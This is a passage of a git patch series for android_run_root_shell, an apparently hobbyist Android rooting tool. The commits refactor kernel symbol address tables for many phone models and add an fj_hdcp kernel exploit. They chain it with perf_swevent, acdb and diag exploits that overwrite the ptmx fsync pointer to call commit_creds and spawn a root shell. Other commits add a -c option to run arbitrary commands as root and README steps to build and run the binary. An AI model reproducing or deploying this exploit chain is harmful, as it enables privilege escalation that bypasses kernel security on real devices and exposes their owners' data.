0xc009843c, 0xc0097f60 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc009ca34, 0xc009c558 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc00938a0, 0xc00933c4 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc00938b0, 0xc00933d4 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc009d500, 0xc009d024 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, - { DEVICE_SOL22_10_2_F_3_43, 0xc009d3f8, 0xc009cf1c }, - { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, - { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, - { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, - { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, - { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, - { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, - { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, - { DEVICE_ST27I_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, - { DEVICE_ST27A_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, - { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6602_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_C5303_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, - { DEVICE_C5302_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, - { DEVICE_M35H_12_0_A_1_257, 0xc009ec08, 0xc009e72c }, - { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, - { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, - { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, - { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c }, - { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c}, - { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, - { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, - { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44}, - { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc}, - { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, - { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, - { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, - { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c }, - { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 }, -}; - -static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); - static bool get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) { - int i; - device_id_t device_id; - - device_id = detect_device(); - - for (i = 0; i < n_supported_devices; i++) { - if (supported_devices[i].device_id == device_id){ - if (prepare_kernel_cred_address) { - *prepare_kernel_cred_address = (void*)supported_devices[i].prepare_kernel_cred_address; - } - if (commit_creds_address) { - *commit_creds_address = (void*)supported_devices[i].commit_creds_address; - } - return true; - } + *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); + *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); + + if (*prepare_kernel_cred_address && *commit_creds_address) { + return true; } print_reason_device_not_supported(); diff --git a/device_database b/device_database index fc3d39c..43c4dd7 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit fc3d39cdb322d6f3b86b37eb9557923935a00159 +Subproject commit 43c4dd73163d70a4ec4b812280a4abad830d2ec8 diff --git a/mm.c b/mm.c index f5dd996..b7db0e2 100644 --- a/mm.c +++ b/mm.c @@ -2,80 +2,13 @@ #include "mm.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int remap_pfn_range_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, - { DEVICE_SC01E_LJ3, 0xc0192124 }, - { DEVICE_SC04E_MDI, 0xc011383c }, - { DEVICE_SC04E_MF1, 0xc01138a4 }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, - { DEVICE_SGP311_10_1_C_0_370, 0xc01090fc }, - { DEVICE_SH04E_01_00_02, 0xc00e458c }, - { DEVICE_SH04E_01_00_03, 0xc00e46bc }, - { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc01124f4 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc0109360 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc0109370 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc0112fc0 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, - { DEVICE_SOL22_10_2_F_3_43, 0xc0112230 }, - { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, - { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, - { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, - { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, - { DEVICE_LG_E975_V10e, 0xc0116598 }, - { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, - { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, - { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, - { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, - { DEVICE_ST27I_6_2_A_1_100, 0xc01366ec}, - { DEVICE_ST27A_6_2_A_1_100, 0xc01366ec}, - { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C6602_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5303_12_0_A_1_257, 0xc011445c }, - { DEVICE_C5302_12_0_A_1_257, 0xc011445c }, - { DEVICE_M35H_12_0_A_1_257, 0xc011445c }, - { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, - { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, - { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, - { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, - { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 }, - { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, - { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, - { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc}, - { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4}, - { DEVICE_N05E_A1000311, 0xc0105800 }, - { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, - { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, - { DEVICE_NEC_101T, 0xc013cccc }, - { DEVICE_NEXUS_JZO54K, 0xc013509c }, -}; - -static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); - unsigned long int _get_remap_pfn_range_address(void) { - int i; - device_id_t device_id; - - device_id = detect_device(); + unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); - for (i = 0; i < n_supported_devices; i++) { - if (supported_devices[i].device_id == device_id){ - return supported_devices[i].remap_pfn_range_address; - } + if (address) { + return address; } print_reason_device_not_supported(); diff --git a/ptmx.c b/ptmx.c index a86a138..ca79c4f 100644 --- a/ptmx.c +++ b/ptmx.c @@ -1,106 +1,17 @@ #include "ptmx.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int ptmx_fops_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_F05D_V08R31C, 0xc07bc164 }, - { DEVICE_F05D_V11R40A, 0xc07bbf44 }, - - // F10D: Fujitsu added a method in struct file_operations - { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, - - { DEVICE_F11D_V24R40A, 0xc1056998 }, - { DEVICE_FJL21_V23R39X, 0xc0ee31f8 }, - { DEVICE_FJL21_V37R47A, 0xc0ee3378 }, - { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, - { DEVICE_SCL21_LJD, 0xc0c71dc0 }, - { DEVICE_SC01E_LJ3, 0xc10a5a48 }, - { DEVICE_SC04E_MDI, 0xc1169808 }, - { DEVICE_SC04E_MF1, 0xc1169848 }, - { DEVICE_ISW11F_V25R45A, 0xc080e268 }, - { DEVICE_ISW11F_V27R47I, 0xc080e028 }, - - // ISW13F: Fujitsu added a method in struct file_operations - { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, - - { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, - { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, - { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, - { DEVICE_SH04E_01_00_02, 0xc0eed190 }, - { DEVICE_SH04E_01_00_03, 0xc0eed190 }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, - { DEVICE_SGP311_10_1_C_0_370, 0xc0d35ca8 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc0d36aa8 }, - { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, - { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, - { DEVICE_SOL21_9_0_F_0_226, 0xc0cffe78 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, - { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, - { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, - { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, - { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, - { DEVICE_LG_E975_V10e, 0xc0f9da70 }, - { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 }, - { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 }, - { DEVICE_ST27I_6_2_A_1_100, 0xc09b98e0}, - { DEVICE_ST27A_6_2_A_1_100, 0xc09b98e0}, - { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, - { DEVICE_C6602_10_1_1_A_1_253, 0xc0d37488 }, - { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_C5303_12_0_A_1_257, 0xc0e3b890 }, - { DEVICE_C5302_12_0_A_1_257, 0xc0e3b890 }, - { DEVICE_M35H_12_0_A_1_257, 0xc0e3b890 }, - { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, - { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, - { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, - { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, - { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00}, - { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, - { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, - { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8}, - { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8}, - { DEVICE_N05E_A1000311, 0xc0f58700 }, - { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, - { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, - { DEVICE_NEC_101T, 0xc02c6da8 }, - { DEVICE_NEXUS_JZO54K, 0xc08b3224 }, -}; - -static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); - unsigned long int get_ptmx_fops_address(void) { - int i; - device_id_t device_id; - - device_id = detect_device(); + unsigned long int address; - for (i = 0; i < n_supported_devices; i++) { - if (supported_devices[i].device_id == device_id) { - return supported_devices[i].ptmx_fops_address; - } + address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); + if (address) { + return address; } if (kallsyms_exist()) { - unsigned long int address; - address = kallsyms_get_symbol_address("ptmx_fops"); if (address) { return address; From b1c58744f3224f8ecb8fc4cbd67fc174b53cfd37 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 3 Jul 2013 10:50:38 +0900 Subject: [PATCH 040/125] Add library libfj_hdcp_exploit --- .gitmodules | 3 +++ Android.mk | 1 + device_database | 2 +- libfj_hdcp_exploit | 1 + main.c | 21 +++++++++++++++++++++ 5 files changed, 27 insertions(+), 1 deletion(-) create mode 160000 libfj_hdcp_exploit diff --git a/.gitmodules b/.gitmodules index 46c8151..41893e1 100644 --- a/.gitmodules +++ b/.gitmodules @@ -10,3 +10,6 @@ [submodule "libmsm_acdb_exploit"] path = libmsm_acdb_exploit url = git://github.com/fi01/libmsm_acdb_exploit.git +[submodule "libfj_hdcp_exploit"] + path = libfj_hdcp_exploit + url = git://github.com/fi01/libfj_hdcp_exploit.git diff --git a/Android.mk b/Android.mk index 63bd288..b00a387 100644 --- a/Android.mk +++ b/Android.mk @@ -16,6 +16,7 @@ LOCAL_STATIC_LIBRARIES := libdiagexploit LOCAL_STATIC_LIBRARIES += libdevice_database LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit +LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libcutils libc include $(BUILD_EXECUTABLE) diff --git a/device_database b/device_database index 43c4dd7..965a795 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 43c4dd73163d70a4ec4b812280a4abad830d2ec8 +Subproject commit 965a7952b67a8fb741e16eee8d75f23f4a8e9c3b diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit new file mode 160000 index 0000000..cb172ec --- /dev/null +++ b/libfj_hdcp_exploit @@ -0,0 +1 @@ +Subproject commit cb172ec96947c0f00033eb461a6718c6e6d7c2a6 diff --git a/main.c b/main.c index 440ec94..1ab452c 100644 --- a/main.c +++ b/main.c @@ -16,6 +16,7 @@ #include "libdiagexploit/diag.h" #include "libperf_event_exploit/perf_event.h" #include "libmsm_acdb_exploit/acdb.h" +#include "libfj_hdcp_exploit/fj_hdcp.h" void obtain_root_privilege(void) @@ -61,6 +62,20 @@ attempt_acdb_exploit(unsigned long int address, unsigned long int original_value return false; } +static bool +attempt_fj_hdcp_exploit(unsigned long int address, unsigned long int original_value) +{ + if (fj_hdcp_run_exploit(address, (int)&obtain_root_privilege, + run_obtain_root_privilege, NULL)) { + + fj_hdcp_write_value_at_address(address, original_value); + + return true; + } + + return false; +} + static bool run_exploit(void) { @@ -87,6 +102,12 @@ run_exploit(void) } printf("\n"); + printf("Attempt fj_hdcp exploit...\n"); + if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { + return true; + } + printf("\n"); + return attempt_diag_exploit(ptmx_fsync_address); } From ceaa681963d372ace5eca0fd3606c2bd5624e6f7 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 4 Jul 2013 13:18:53 +0900 Subject: [PATCH 041/125] Support command line option to run command as root --- device_database | 2 +- libperf_event_exploit | 2 +- main.c | 16 +++++++++++++++- 3 files changed, 17 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 965a795..d11c8ae 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 965a7952b67a8fb741e16eee8d75f23f4a8e9c3b +Subproject commit d11c8aef7fd94d47dded59c0195d21cee2c797f3 diff --git a/libperf_event_exploit b/libperf_event_exploit index b4783b3..b89b9cb 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b4783b3ab5ebba4e8619fef2daf528aaa11785b8 +Subproject commit b89b9cb75df71c27aa09369fee6d92d906563502 diff --git a/main.c b/main.c index 1ab452c..3aeb746 100644 --- a/main.c +++ b/main.c @@ -114,6 +114,16 @@ run_exploit(void) int main(int argc, char **argv) { + char* command = NULL; + int i; + for (i = 1; i < argc; i++) { + if (!strcmp(argv[i], "-c")) { + if (++i < argc) { + command = argv[i]; + } + } + } + set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { @@ -133,7 +143,11 @@ main(int argc, char **argv) exit(EXIT_FAILURE); } - system("/system/bin/sh"); + if (command == NULL) { + system("/system/bin/sh"); + } else { + execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); + } exit(EXIT_SUCCESS); } From ae093af5bf374a697c3634713f4ea8f04b19aa62 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 5 Jul 2013 20:42:01 +0530 Subject: [PATCH 042/125] update subprojects --- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index d11c8ae..e49824e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit d11c8aef7fd94d47dded59c0195d21cee2c797f3 +Subproject commit e49824eef2fa8bc4865e79be6c608e6762813933 diff --git a/libdiagexploit b/libdiagexploit index 5ee183b..80d0ad5 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 5ee183b31d4928315a0d7b171680b0ae9b1a7d9c +Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d diff --git a/libperf_event_exploit b/libperf_event_exploit index b89b9cb..bf2d8c7 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b89b9cb75df71c27aa09369fee6d92d906563502 +Subproject commit bf2d8c7482fa410f800b4920322193bc33143916 From 954f38d5735b9e49d707dc8a2ce9dcec4a793032 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 5 Jul 2013 21:42:50 +0530 Subject: [PATCH 043/125] added support for Xperia Z (C6602/3) - 10.3.A.0.423 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index e49824e..8cf50a1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e49824eef2fa8bc4865e79be6c608e6762813933 +Subproject commit 8cf50a1296d88a1bf15fe459a8532be0010c9a9a diff --git a/libperf_event_exploit b/libperf_event_exploit index bf2d8c7..0ece0cb 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit bf2d8c7482fa410f800b4920322193bc33143916 +Subproject commit 0ece0cbd0d96973031b80297f65e06afa99678b0 From e32c10941f1a5fa38f06e3498bbdbee6d87e6130 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 5 Jul 2013 23:15:55 +0530 Subject: [PATCH 044/125] updated subprojects --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 8cf50a1..78d450c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8cf50a1296d88a1bf15fe459a8532be0010c9a9a +Subproject commit 78d450cf6e06748da824b2e465eb2933a9cc0f1b diff --git a/libperf_event_exploit b/libperf_event_exploit index 0ece0cb..395f270 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 0ece0cbd0d96973031b80297f65e06afa99678b0 +Subproject commit 395f270cd1e68f40b761c8d10e3768614031b9c8 From 6fca3f904ccdfe35a71e2fc0e0ed6ba134f0305c Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 00:27:52 +0530 Subject: [PATCH 045/125] give preference to perf_event exploit --- main.c | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/main.c b/main.c index 3aeb746..fb8ebcf 100644 --- a/main.c +++ b/main.c @@ -89,11 +89,6 @@ run_exploit(void) ptmx_fsync_address = ptmx_fops_address + 0x38; - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { - return true; - } - printf("\n"); printf("Attempt perf_swevent exploit...\n"); if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, @@ -102,6 +97,12 @@ run_exploit(void) } printf("\n"); + printf("Attempt acdb exploit...\n"); + if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { + return true; + } + printf("\n"); + printf("Attempt fj_hdcp exploit...\n"); if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { return true; From d78eb8c5f7f4fdbbe57e98482cd3d009908c06bc Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 00:31:33 +0530 Subject: [PATCH 046/125] little debug: show detected device right at start --- main.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/main.c b/main.c index fb8ebcf..7be82fd 100644 --- a/main.c +++ b/main.c @@ -10,6 +10,7 @@ #include #include +#include #include "cred.h" #include "mm.h" #include "ptmx.h" @@ -112,6 +113,18 @@ run_exploit(void) return attempt_diag_exploit(ptmx_fsync_address); } +void +device_detected(void) +{ + char device[PROP_VALUE_MAX]; + char build_id[PROP_VALUE_MAX]; + + __system_property_get("ro.product.model", device); + __system_property_get("ro.build.display.id", build_id); + + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); +} + int main(int argc, char **argv) { @@ -125,6 +138,8 @@ main(int argc, char **argv) } } + device_detected(); + set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { From 2c1eb470dd8ba8922911b40a605ef4d398302ee7 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 00:58:40 +0530 Subject: [PATCH 047/125] updated subprojects with device support for C5302/3/6, SOL21, LT26i, LT25i, LT28h some firmwares --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 78d450c..afc05af 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 78d450cf6e06748da824b2e465eb2933a9cc0f1b +Subproject commit afc05afc5d072a6fc35d663ad81a0791af441b7d diff --git a/libperf_event_exploit b/libperf_event_exploit index 395f270..252930e 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 395f270cd1e68f40b761c8d10e3768614031b9c8 +Subproject commit 252930e7737f061cb40758f4e4cf8cba2ef3850c From 5e69530e3d65e377ea2b49315af099b0e6b19033 Mon Sep 17 00:00:00 2001 From: schizoidboy Date: Sat, 6 Jul 2013 10:26:00 -0700 Subject: [PATCH 048/125] Add Building section to README.md --- README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index cdbbc4b..9233a8e 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,13 @@ -# +android_run_root_shell +====================== This code is still ugly, please re-write it and send pull-requests, if you want to use this. + +Building +======== + +* Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads +* Extract into some directory and put that in your path: export PATH=ANDK_DIR:$PATH +* In another directory: git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell +* cd android_run_root_shell +* ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk From 01dfcaa234f0c28aac722f57ccad5ddffac0a09d Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 6 Jul 2013 23:10:50 +0530 Subject: [PATCH 049/125] updated readme --- README.md | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 9233a8e..a96df76 100644 --- a/README.md +++ b/README.md @@ -3,11 +3,24 @@ android_run_root_shell This code is still ugly, please re-write it and send pull-requests, if you want to use this. + Building ======== * Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads -* Extract into some directory and put that in your path: export PATH=ANDK_DIR:$PATH -* In another directory: git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell -* cd android_run_root_shell -* ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk + +* Extract into some directory and put that in your path: + `export PATH=ANDK_DIR:$PATH` + +* In another directory clone this repo: + `git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell` + +* Change to the directory where the repo was cloned + `cd android_run_root_shell` + +* To start build process use the following + `ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk` + +* If all goes well you will get the compiled binary at: + `./libs/armeabi/run_root_shell` + From 7f0faa347202e60802b7f6f17b81933419b9bab4 Mon Sep 17 00:00:00 2001 From: schizoidboy Date: Sat, 6 Jul 2013 15:42:41 -0700 Subject: [PATCH 050/125] Add run instructions to README.md --- README.md | 26 +++++++++++++++++++++++++- 1 file changed, 25 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index a96df76..02d7b19 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ This code is still ugly, please re-write it and send pull-requests, if you want Building ======== -* Download Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads +* Download the Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads * Extract into some directory and put that in your path: `export PATH=ANDK_DIR:$PATH` @@ -24,3 +24,27 @@ Building * If all goes well you will get the compiled binary at: `./libs/armeabi/run_root_shell` + +Running +======= + +* Download the Android Software Development Kit (SDK) ADT Bundle: http://developer.android.com/sdk/index.html + +* Extract into some directory and put the platform-tools folder in your path: + `export PATH=SDK_DIR/sdk/platform-tools/:$PATH` + +* Change to the directory with the combiled run_root_shell binary (see above) + +* Connect your Android device through USB (click Cancel if it asks to enable USB storage; charging only is the correct mode) and enable USB debugging on the device. + +* Start the adb server on your computer: + `sudo adb start-server` + +* Transfer run_root_shell to a temporary directory on the phone: + `adb push run_root_shell /data/local` + +* Ensure that run_root_shell has execute permissions: + `adb shell chmod 777 /data/local/run_root_shell` + +* Run the command on the phone: + `adb shell /data/local/run_root_shell` From dc46b5ff30036596d1fb9cd46aa6c66ec810bc25 Mon Sep 17 00:00:00 2001 From: schizoidboy Date: Sat, 6 Jul 2013 15:43:49 -0700 Subject: [PATCH 051/125] Add run instructions to README.md - fix typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 02d7b19..e59b0fe 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,7 @@ Running * Extract into some directory and put the platform-tools folder in your path: `export PATH=SDK_DIR/sdk/platform-tools/:$PATH` -* Change to the directory with the combiled run_root_shell binary (see above) +* Change to the directory with the compiled run_root_shell binary (see above) * Connect your Android device through USB (click Cancel if it asks to enable USB storage; charging only is the correct mode) and enable USB debugging on the device. From 2d40b541fe208077b94be47c56209f4fc0d6dcb5 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 21:25:28 +0530 Subject: [PATCH 052/125] added support for (M36h) a variant of Xperia ZR (C550X) - 10.1.1.A.1.310 --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index afc05af..cd0b333 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit afc05afc5d072a6fc35d663ad81a0791af441b7d +Subproject commit cd0b333871ffa00da5163090c1ee6de4bf766421 diff --git a/libperf_event_exploit b/libperf_event_exploit index 252930e..b62982f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 252930e7737f061cb40758f4e4cf8cba2ef3850c +Subproject commit b62982f136d8d33bcde3c7147525826a4ced0c53 From 67ffd5a07aa2140853bf85635f3ad027f89091c6 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 7 Jul 2013 23:30:22 +0530 Subject: [PATCH 053/125] added support for Xperia SL (LT26ii) 